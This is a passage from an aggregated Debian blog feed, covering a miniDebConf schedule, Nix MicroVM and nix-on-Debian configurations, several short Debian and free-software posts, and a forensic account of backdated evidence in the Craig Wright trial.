from the APUL non-teaching-staff union of said university.</p>
<p><a href="https://gwolf.org/files/2024-03/guille_graba.jpg">
<img align="right" height="115" src="https://gwolf.org/files/2024-03/guille_graba.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>We had the following set of talks (for which there is a promise to get
electronic record, as APUL was kind enough to record them! of course, I will
push them to our usual conference video archiving service as soon as I get them)</p>
<table>
<thead>
<tr>
<th><strong>Hour</strong></th>
<th><strong>Title (Spanish)</strong></th>
<th><strong>Title (English)</strong></th>
<th><strong>Presented by</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>10:00-10:25</td>
<td>Introducción al Software Libre</td>
<td>Introduction to Free Software</td>
<td>Martín Bayo</td>
</tr>
<tr>
<td>10:30-10:55</td>
<td>Debian y su comunidad</td>
<td>Debian and its community</td>
<td>Emanuel Arias</td>
</tr>
<tr>
<td>11:00-11:25</td>
<td>¿Por qué sigo contribuyendo a Debian después de 20 años?</td>
<td>Why am I still contributing to Debian after 20 years?</td>
<td>Santiago Ruano</td>
</tr>
<tr>
<td>11:30-11:55</td>
<td>Mi identidad y el proyecto Debian: ¿Qué es el llavero OpenPGP y por qué?</td>
<td>My identity and the Debian project: What is the OpenPGP keyring and why?</td>
<td>Gunnar Wolf</td>
</tr>
<tr>
<td>12:00-13:00</td>
<td>Explorando las masculinidades en el contexto del Software Libre</td>
<td>Exploring masculinities in the context of Free Software</td>
<td>Gora Ortiz Fuentes - José Francisco Ferro</td>
</tr>
<tr>
<td>13:00-14:30</td>
<td><strong>Lunch</strong></td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>14:30-14:55</td>
<td>Debian para el día a día</td>
<td>Debian for our every day</td>
<td>Leonardo Martínez</td>
</tr>
<tr>
<td>15:00-15:25</td>
<td>Debian en las Raspberry Pi</td>
<td>Debian in the Raspberry Pi</td>
<td>Gunnar Wolf</td>
</tr>
<tr>
<td>15:30-15:55</td>
<td>Device Trees</td>
<td>Device Trees</td>
<td>Lisandro Damián Nicanor Perez Meyer (videoconferencia)</td>
</tr>
<tr>
<td>16:00-16:25</td>
<td>Python en Debian</td>
<td>Python in Debian</td>
<td>Emmanuel Arias</td>
</tr>
<tr>
<td>16:30-16:55</td>
<td>Debian y XMPP en la medición de viento para la energía eólica</td>
<td>Debian and XMPP for wind measuring for eolic energy</td>
<td>Martin Borgert</td>
</tr>
</tbody>
</table>
<p>As it always happens… DebConf, miniDebConf and other Debian-related activities
are always fun, always productive, always a great opportunity to meet again our
decades-long friends. Lets see what comes next!</p>Gunnar Wolfhttps://gwolf.orgMinimal overhead VMs with Nix and MicroVMhttps://blog.koch.ro/posts/2024-03-17-minimal-vms-nix-microvm.html2024-03-17T10:13:40+00:00<div class="info">
Posted on March 17, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/nix.html" title="All pages tagged 'nix'.">nix</a>
</div>
<p>Joachim Breitner wrote about a <a href="https://www.joachim-breitner.de/blog/812-Convenient_sandboxed_development_environment">Convenient sandboxed development environment</a> and thus reminded me to blog about <a href="https://github.com/astro/microvm.nix">MicroVM</a>. I’ve toyed around with it a little but not yet seriously used it as I’m currently not coding.</p>
<p>MicroVM is a nix based project to configure and run minimal VMs. It can mount and thus reuse the hosts nix store inside the VM and thus has a very small disk footprint. I use MicroVM on a debian system using the nix package manager.</p>
<p>The MicroVM author uses the project to host production services. Otherwise I consider it also a nice way to learn about NixOS after having started with the nix package manager and before making the big step to NixOS as my main system.</p>
<p>The guests root filesystem is a tmpdir, so one must explicitly define folders that should be mounted from the host and thus be persistent across VM reboots.</p>
<p>I defined the VM as a nix flake since this is how I started from the MicroVM projects example:</p>
<pre><code>{
description = "Haskell dev MicroVM";
inputs.impermanence.url = "github:nix-community/impermanence";
inputs.microvm.url = "github:astro/microvm.nix";
inputs.microvm.inputs.nixpkgs.follows = "nixpkgs";
outputs = { self, impermanence, microvm, nixpkgs }:
let
persistencePath = "/persistent";
system = "x86_64-linux";
user = "thk";
vmname = "haskell";
nixosConfiguration = nixpkgs.lib.nixosSystem {
inherit system;
modules = [
microvm.nixosModules.microvm
impermanence.nixosModules.impermanence
({pkgs, ... }: {
environment.persistence.${persistencePath} = {
hideMounts = true;
users.${user} = {
directories = [
"git" ".stack"
];
};
};
environment.sessionVariables = {
TERM = "screen-256color";
};
environment.systemPackages = with pkgs; [
ghc
git
(haskell-language-server.override { supportedGhcVersions = [ "94" ]; })
htop
stack
tmux
tree
vcsh
zsh
];
fileSystems.${persistencePath}.neededForBoot = nixpkgs.lib.mkForce true;
microvm = {
forwardPorts = [
{ from = "host"; host.port = 2222; guest.port = 22; }
{ from = "guest"; host.port = 5432; guest.port = 5432; } # postgresql
];
hypervisor = "qemu";
interfaces = [
{ type = "user"; id = "usernet"; mac = "00:00:00:00:00:02"; }
];
mem = 4096;
shares = [ {
# use "virtiofs" for MicroVMs that are started by systemd
proto = "9p";
tag = "ro-store";
# a host's /nix/store will be picked up so that no
# squashfs/erofs will be built for it.
source = "/nix/store";
mountPoint = "/nix/.ro-store";
} {
proto = "virtiofs";
tag = "persistent";
source = "~/.local/share/microvm/vms/${vmname}/persistent";
mountPoint = persistencePath;
socket = "/run/user/1000/microvm-${vmname}-persistent";
}
];
socket = "/run/user/1000/microvm-control.socket";
vcpu = 3;
volumes = [];
writableStoreOverlay = "/nix/.rwstore";
};
networking.hostName = vmname;
nix.enable = true;
nix.nixPath = ["nixpkgs=${builtins.storePath <nixpkgs>}"];
nix.settings = {
extra-experimental-features = ["nix-command" "flakes"];
trusted-users = [user];
};
security.sudo = {
enable = true;
wheelNeedsPassword = false;
};
services.getty.autologinUser = user;
services.openssh = {
enable = true;
};
system.stateVersion = "24.11";
systemd.services.loadnixdb = {
description = "import hosts nix database";
path = [pkgs.nix];
wantedBy = ["multi-user.target"];
requires = ["nix-daemon.service"];
script = "cat ${persistencePath}/nix-store-db-dump|nix-store --load-db";
};
time.timeZone = nixpkgs.lib.mkDefault "Europe/Berlin";
users.users.${user} = {
extraGroups = [ "wheel" "video" ];
group = "user";
isNormalUser = true;
openssh.authorizedKeys.keys = [
"ssh-rsa REDACTED"
];
password = "";
};
users.users.root.password = "";
users.groups.user = {};
})
];
};
in {
packages.${system}.default = nixosConfiguration.config.microvm.declaredRunner;
};
}
</code></pre>
<p>I start the microVM with a templated systemd user service:</p>
<pre><code>[Unit]
Description=MicroVM for Haskell development
Requires=microvm-virtiofsd-persistent@.service
After=microvm-virtiofsd-persistent@.service
AssertFileNotEmpty=%h/.local/share/microvm/vms/%i/flake/flake.nix
[Service]
Type=forking
ExecStartPre=/usr/bin/sh -c "[ /nix/var/nix/db/db.sqlite -ot %h/.local/share/microvm/nix-store-db-dump ] || nix-store --dump-db >%h/.local/share/microvm/nix-store-db-dump"
ExecStartPre=ln -f -t %h/.local/share/microvm/vms/%i/persistent/ %h/.local/share/microvm/nix-store-db-dump
ExecStartPre=-%h/.local/state/nix/profile/bin/tmux new -s microvm -d
ExecStart=%h/.local/state/nix/profile/bin/tmux new-window -t microvm: -n "%i" "exec %h/.local/state/nix/profile/bin/nix run --impure %h/.local/share/microvm/vms/%i/flake"
</code></pre>
<p>The above service definition creates a dump of the hosts nix store db so that it can be imported in the guest. This is necessary so that the guest can actually use what is available in /nix/store. There is an <a href="https://github.com/NixOS/rfcs/pull/152#issuecomment-1979117890">effort for an overlayed nix store</a> that would be preferable to this hack.</p>
<p>Finally the microvm is started inside a tmux session named “microvm”. This way I can use the VM with SSH or through the console and also access the qemu console.</p>
<p>And for completeness the virtiofsd service:</p>
<pre><code>[Unit]
Description=serve host persistent folder for dev VM
AssertPathIsDirectory=%h/.local/share/microvm/vms/%i/persistent
[Service]
ExecStart=%h/.local/state/nix/profile/bin/virtiofsd \
--socket-path=${XDG_RUNTIME_DIR}/microvm-%i-persistent \
--shared-dir=%h/.local/share/microvm/vms/%i/persistent \
--gid-map :995:%G:1: \
--uid-map :1000:%U:1:
</code></pre>Thomas Kochhttps://blog.koch.roRebuild search with trusthttps://blog.koch.ro/posts/2024-01-20-rebuild-search-with-trust.html2024-03-17T10:13:40+00:00<div class="info">
Posted on January 20, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>, <a href="https://blog.koch.ro/tags/search.html" title="All pages tagged 'search'.">search</a>, <a href="https://blog.koch.ro/tags/decentralization.html" title="All pages tagged 'decentralization'.">decentralization</a>
</div>
<p>Finally there is a thing people can agree on:</p>
<ul>
<li>2023-08-28, OSNews: <a href="https://www.osnews.com/story/136829/the-end-of-the-googleverse/">The end of the Googleverse</a></li>
<li>2023-07-28, Cory Doctorow: <a href="https://pluralistic.net/2023/07/28/microincentives-and-enshittification/">Microincentives and Enshittification</a></li>
<li>2023-10-03, Cory Doctorow: <a href="https://pluralistic.net/2023/10/03/not-feeling-lucky/">Google’s enshittification memos</a></li>
<li>2024-01-15, Tim Bray: <a href="https://www.tbray.org/ongoing/When/202x/2024/01/15/Google-2024">Mourning Google</a></li>
</ul>
<p>Apparently, Google Search is not good anymore. And I’m not the only one thinking about decentralization to fix it:</p>
<p><a href="https://media.ccc.de/v/37c3-lightningtalks-58060-honey-i-federated-the-search-engine-finding-stuff-online-post-big-tech">Honey I federated the search engine - finding stuff online post-big tech</a> - a lightning talk at the recent chaos communication congress</p>
<p>The speaker however did not mention, <a href="https://en.wikipedia.org/wiki/Distributed_search_engine">that</a> <a href="https://wiki.p2pfoundation.net/Distributed_Search_Engines">there</a> <a href="https://blog.florence.chat/a-distributed-search-engine-for-the-distributed-web-39c377dc700e">have</a> <a href="https://web.archive.org/web/20230902052010/https://hackernoon.com/is-the-concept-of-a-distributed-search-engine-potent-enough-to-challenge-googles-dominance-l1s44t2">already</a> <a href="https://web.archive.org/web/20200914192255/https://github.com/nvasilakis/yippee">been</a> <a href="https://www.techdirt.com/2014/07/08/distributed-search-engines-why-we-need-them-post-snowden-world/">many</a> <a href="https://github.com/kearch/kearch">attempts</a> at building distributed search engines. So why do I think that such an attempt could finally succeed?</p>
<ul>
<li>More people are searching for alternatives to Google.</li>
<li>Mainstream hard discs are incredibly big.</li>
<li>Mainstream internet connection is incredibly fast.</li>
<li>Google is bleeding talent.</li>
<li>Most of the building blocks are available as free software.</li>
<li>“Success” depends on your definition…</li>
</ul>
<p>My definition of success is:</p>
<blockquote>
<p>A mildly technical computer user (able to install software) has access to a search engine that provides them with superior search results compared to Google for at least a few predefined areas of interest.</p>
</blockquote>
<p>The exact algorithm used by Google Search to rank websites is a secret even to most Googlers. However I assume that it relies heavily on big data.</p>
<p>A distributed search engine however can instead rely on user input. Every admin of one node seeds the node ranking with their personal selection of trusted sites. They connect their node with nodes of people they trust. This results in a web of (transitive) trust much like pgp.</p>
<p>Imagine you are searching for something in a world without computers: You ask the people around you and probably they forward your question to their peers.</p>
<p>I already had a look at <a href="https://yacy.net">YaCy</a>. It is active, somewhat usable and has a friendly maintainer. Unfortunately I consider the codebase to not be worth the effort. Nevertheless, YaCy is a good example that a decentralized search software can be done even by a small team or just one person.</p>
<p>I myself started working on a software in Haskell and keep my notes here: <a href="https://de.populus.wiki/wiki/Populus:DezInV">Populus:DezInV</a>. Since I’m learning Haskell along the way, there is nothing there to see yet. Additionally I took a yak shaving break to learn <a>nix</a>.</p>
<p>By the way: <a href="https://thepeoplesvoice.tv/google-lite-duckduckgo-signs-secret-deal-with-bill-gates-to-track-users-online/">DuckDuckGo is not the alternative</a>. And while I would encourage you to also try Yandex for a second opinion, I don’t consider this a solution.</p>Thomas Kochhttps://blog.koch.roUsing nix package manager in Debianhttps://blog.koch.ro/posts/2024-01-16-using-nix-package-manager-in-debian.html2024-03-17T10:13:40+00:00<div class="info">
Posted on January 16, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/nix.html" title="All pages tagged 'nix'.">nix</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>The <a href="https://nixos.org">nix</a> package manager is <a href="https://tracker.debian.org/pkg/nix">available in Debian</a> since <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877019">May 2020</a>. Why would one use it in Debian?</p>
<ul>
<li>learn about nix</li>
<li>install software that might not be available in Debian</li>
<li>install software without root access</li>
<li>declare software necessary for a user’s environment inside <code>$HOME/.config</code></li>
</ul>
<p>Especially the last point nagged me every time I set up a new Debian installation. My emacs configuration and my Desktop setup expects certain software to be installed.</p>
<p>Please be aware that I’m a beginner with nix and that my config might not follow best practice. Additionally many nix users are already using the new flakes feature of nix that I’m still learning about.</p>
<p>So I’ve got this file at <code>.config/nixpkgs/config.nix</code><a class="footnote-ref" href="https://blog.koch.ro/tags/debian.atom.xml#fn1" id="fnref1"><sup>1</sup></a>:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode nix"><code class="sourceCode bash"><span id="cb1-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-1"></a><span class="ex">with</span> (import <span class="op"><</span>nixpkgs<span class="op">></span> {});</span>
<span id="cb1-2"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-2"></a><span class="kw">{</span></span>
<span id="cb1-3"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-3"></a> <span class="ex">packageOverrides</span> = pkgs: with pkgs<span class="kw">;</span> <span class="kw">{</span></span>
<span id="cb1-4"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-4"></a> <span class="ex">thk-emacsWithPackages</span> = (pkgs.emacsPackagesFor emacs-gtk)<span class="ex">.emacsWithPackages</span> (</span>
<span id="cb1-5"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-5"></a> <span class="ex">epkgs</span>:</span>
<span id="cb1-6"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-6"></a> <span class="kw">(</span><span class="ex">with</span> epkgs.elpaPackages<span class="kw">;</span><span class="bu"> [</span></span>
<span id="cb1-7"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-7"></a> ace-window</span>
<span id="cb1-8"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-8"></a> company</span>
<span id="cb1-9"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-9"></a> org</span>
<span id="cb1-10"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-10"></a> use-package</span>
<span id="cb1-11"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-11"></a> ]) ++ (with epkgs.melpaPackages; [</span>
<span id="cb1-12"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-12"></a> editorconfig</span>
<span id="cb1-13"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-13"></a> flycheck</span>
<span id="cb1-14"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-14"></a> haskell-mode</span>
<span id="cb1-15"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-15"></a> magit</span>
<span id="cb1-16"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-16"></a> nix-mode</span>
<span id="cb1-17"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-17"></a> paredit</span>
<span id="cb1-18"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-18"></a> rainbow-delimiters</span>
<span id="cb1-19"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-19"></a> treemacs</span>
<span id="cb1-20"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-20"></a> visual-fill-column</span>
<span id="cb1-21"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-21"></a> yasnippet-snippets</span>
<span id="cb1-22"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-22"></a> ]) ++ [ # From main packages set</span>
<span id="cb1-23"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-23"></a> ]</span>
<span id="cb1-24"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-24"></a> );</span>
<span id="cb1-25"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-25"></a></span>
<span id="cb1-26"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-26"></a> userPackages <span class="ot">=</span> buildEnv {</span>
<span id="cb1-27"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-27"></a> extraOutputsToInstall <span class="ot">=</span> [ <span class="st">"doc"</span> <span class="st">"info"</span> <span class="st">"man"</span><span class="bu"> ]</span>;</span>
<span id="cb1-28"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-28"></a> <span class="ex">name</span> = <span class="st">"user-packages"</span><span class="kw">;</span></span>
<span id="cb1-29"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-29"></a> <span class="ex">paths</span> = [</span>
<span id="cb1-30"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-30"></a> <span class="ex">ghc</span></span>
<span id="cb1-31"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-31"></a> <span class="fu">git</span></span>
<span id="cb1-32"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-32"></a> <span class="kw">(</span><span class="ex">pkgs.haskell-language-server.override</span> { supportedGhcVersions = [ <span class="st">"94"</span> ]<span class="kw">;</span> }<span class="kw">)</span></span>
<span id="cb1-33"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-33"></a> <span class="ex">nix</span></span>
<span id="cb1-34"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-34"></a> <span class="ex">stack</span></span>
<span id="cb1-35"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-35"></a> <span class="ex">thk-emacsWithPackages</span></span>
<span id="cb1-36"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-36"></a> <span class="ex">tmux</span></span>
<span id="cb1-37"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-37"></a> <span class="ex">vcsh</span></span>
<span id="cb1-38"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-38"></a> <span class="ex">virtiofsd</span></span>
<span id="cb1-39"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-39"></a> ];</span>
<span id="cb1-40"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-40"></a> };</span>
<span id="cb1-41"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-41"></a> };</span>
<span id="cb1-42"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-42"></a>}</span></code></pre></div>
<p>Every time I change the file or want to receive updates, I do:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb2-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb2-1"></a><span class="ex">nix-env</span> --install --attr nixpkgs.userPackages --remove-all</span></code></pre></div>
<p>You can see that I install nix with nix. This gives me a newer version than the one available in Debian stable. However, the nix-daemon still runs as the older binary from Debian. My dirty hack is to put this override in <code>/etc/systemd/system/nix-daemon.service.d/override.conf</code>:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode ini"><code class="sourceCode ini"><span id="cb3-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-1"></a><span class="kw">[Service]</span></span>
<span id="cb3-2"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-2"></a><span class="dt">ExecStart</span><span class="ot">=</span></span>
<span id="cb3-3"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-3"></a><span class="dt">ExecStart</span><span class="ot">=</span><span class="st">@/home/thk/.local/state/nix/profile/bin/nix-daemon nix-daemon --daemon</span></span></code></pre></div>
<p>I’m not too interested in a cleaner way since I hope to fully migrate to Nix anyways.</p>
<section class="footnotes">
<hr />
<ol>
<li id="fn1"><p>Note the <code>nixpkgs</code> in the path. This is not a config file for <code>nix</code> the package manager but for the <a href="https://github.com/NixOS/nixpkgs">nix package collection</a>. See the <a href="https://nixos.org/manual/nixpkgs/stable/#chap-packageconfig">nixpkgs manual</a>.<a class="footnote-back" href="https://blog.koch.ro/tags/debian.atom.xml#fnref1">↩︎</a></p></li>
</ol>
</section>Thomas Kochhttps://blog.koch.roChromium gtk-filechooser preview sizehttps://blog.koch.ro/posts/2024-01-09-chromium-gtk-filechooser-preview-size.html2024-03-17T10:13:40+00:00<div class="info">
Posted on January 9, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>I wanted to report this issue in <a href="https://bugs.chromium.org/p/chromium/issues/wizard">chromiums issue tracker</a>, but it gave me:</p>
<blockquote>
<p>“Something went wrong, please try again later.”</p>
</blockquote>
<p>Ok, then at least let me reply to this <a href="https://askubuntu.com/questions/788408/open-upload-file-dialogue-make-file-preview-larger">askubuntu question</a>. But my attempt to signup with my launchpad account gave me:</p>
<blockquote>
<p>“Launchpad Login Failed. Please try logging in again.”</p>
</blockquote>
<p>I refrain from commenting on this to not violate some code of conduct.</p>
<p>So this is what I wanted to write:</p>
<blockquote>
<p><strong>GTK file chooser image preview size should be configurable</strong></p>
<p>The file chooser that appears when uploading a file (e.g. an image to Google Fotos) learned to show a preview in <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=15500">issue 15500</a>.</p>
<p>The preview image size is hard coded to 256x512 in kPreviewWidth and kPreviewHeight in <a href="https://source.chromium.org/chromium/chromium/src/+/main:ui/gtk/select_file_dialog_linux_gtk.cc;drc=d0b88a2bb42b34c43720c0e9ee2543e4c9df3071;l=160"><code>ui/gtk/select_file_dialog_linux_gtk.cc</code></a>.</p>
<p>Please make the size configurable.</p>
<p>On high DPI screens the images are too small to be of much use.</p>
</blockquote>
<p>Yes, I should not use chromium anymore.</p>Thomas Kochhttps://blog.koch.roGood things come ... state folderhttps://blog.koch.ro/posts/2024-01-02-good-things-state-folder.html2024-03-17T10:13:40+00:00<div class="info">
Posted on January 2, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>Just a little while ago (10 years) <a href="https://lists.freedesktop.org/pipermail/xdg/2012-December/012598.html">I proposed</a> the <a href="https://web.archive.org/web/20161127085425/http://koch.ro/blog/index.php?/archives/163-Waiting-for-a-STATE-folder-in-the-XDG-basedir-spec.html">addition of a state folder</a> to the <a href="https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html">XDG basedir specification</a> and expanded the article <a href="https://wiki.debian.org/XDGBaseDirectorySpecification">XDGBaseDirectorySpecification</a> in the Debian wiki. Recently <a href="https://www.reddit.com/r/linux/comments/ny34vs/new_xdg_state_home_in_xdg_base_directory_spec/?rdt=53526">I learned</a>, that version 0.8 (from May 2021) of the spec finally includes a state folder.</p>
<p>Granted, I wasn’t the <a href="https://lists.freedesktop.org/pipermail/xdg/2009-February/010191.html">first to have this idea</a> (2009), nor the one who actually <a href="https://lists.freedesktop.org/archives/xdg/2021-February/014434.html">made it happen</a>.</p>
<p>Now, please go ahead and use it! Thank you.</p>Thomas Kochhttps://blog.koch.roOpenPGP Paper Backuphttps://prezu.ca/post/openpgp-paper-backup/2024-03-15T21:42:39+00:00openpgp-paper-backup I’ve been using OpenPGP through GnuPG since early 2000’. It’s an essential part of Debian Developer’s workflow. We use it regularly to authenticate package uploads and votes. Proper backups of that key are really important.
Up until recently, the only reliable option for me was backing up a tarball of my ~/.gnupg offline on a set few flash drives. This approach is better than nothing, but it’s not nearly as reliable as I’d like it to be.l (Patryk Cisekpatryk@cisek.emaiteamwork in practicehttps://info.comodo.priv.at/blog/teamwork_in_practice.html2024-03-14T22:10:53+00:00<p>teamwork, or: why I love the Debian Perl Group:</p>
<p>elbrus has introduced a (very untypical) <a href="https://tracker.debian.org/pkg/libmediascan">package</a> into the
Debian Perl Group in 2022.</p>
<p>after changes of the default compiler options
<code>(-Werror=implicit-function-declaration)</code> in debian, it didn't
build any more & received an <a href="https://bugs.debian.org/1066249">RC bug</a>.</p>
<p>because I sometimes like challenges, I had a look at it & cobbled together
a patch. as I hardly speak any C, I sent my notes to the bug report
& (implictly) asked for help. – & went out to meet a
friend.</p>
<p>when I came home, I found an email from ntyni, sent less than 2 hours
after my mail, where he friendly pointed out the issues with my patch
– & sent a corrected version.</p>
<p>all I needed to do was to adjust the patch & upload the package. one
more bug fixed, one less task for us, & elbrus can concentrate on more
important tasks :)<br /> thanks again, niko!</p>Gregor Herrmannhttps://info.comodo.priv.at/blog/Digital forgeries are hardhttps://mjg59.dreamwidth.org/69507.html2024-03-14T09:11:32+00:00Closing arguments in the trial between various people and <a href="https://en.wikipedia.org/wiki/Craig_Steven_Wright">Craig Wright</a> over whether he's <a href="https://en.wikipedia.org/wiki/Satoshi_Nakamoto">Satoshi Nakamoto</a> are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for <em>both</em> sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.<br /><br />One of the pieces of evidence entered is screenshots of data from <a href="https://myob.com">Mind Your Own Business</a>, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.<br /><br />One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the data base in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.<br /><br />This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.<br /><br />And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This was created by the client, so was consistent with the email having been sent in 2024, not being sent in 2019 and somehow getting stuck somewhere before delivery. The date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.<br /><br />But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.<br /><br />This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.<br /><br />Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.<br /><br />(References: <a href="https://www.dropbox.com/scl/fo/4y3gdele4foy15006z8ch/h?rlkey=scs42wew1o3vwfv0nduhc43dm&dl=0">this Dropbox</a>, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")<br /><br /><img alt="comment count unavailable" height="12" src="https://www.dreamwidth.org/tools/commentcount?user=mjg59&ditemid=69507" style="vertical-align: middle;" width="30" /> commentsMatthew Garretthttps://mjg59.dreamwidth.org/ciw 0.0.1 on CRAN: New 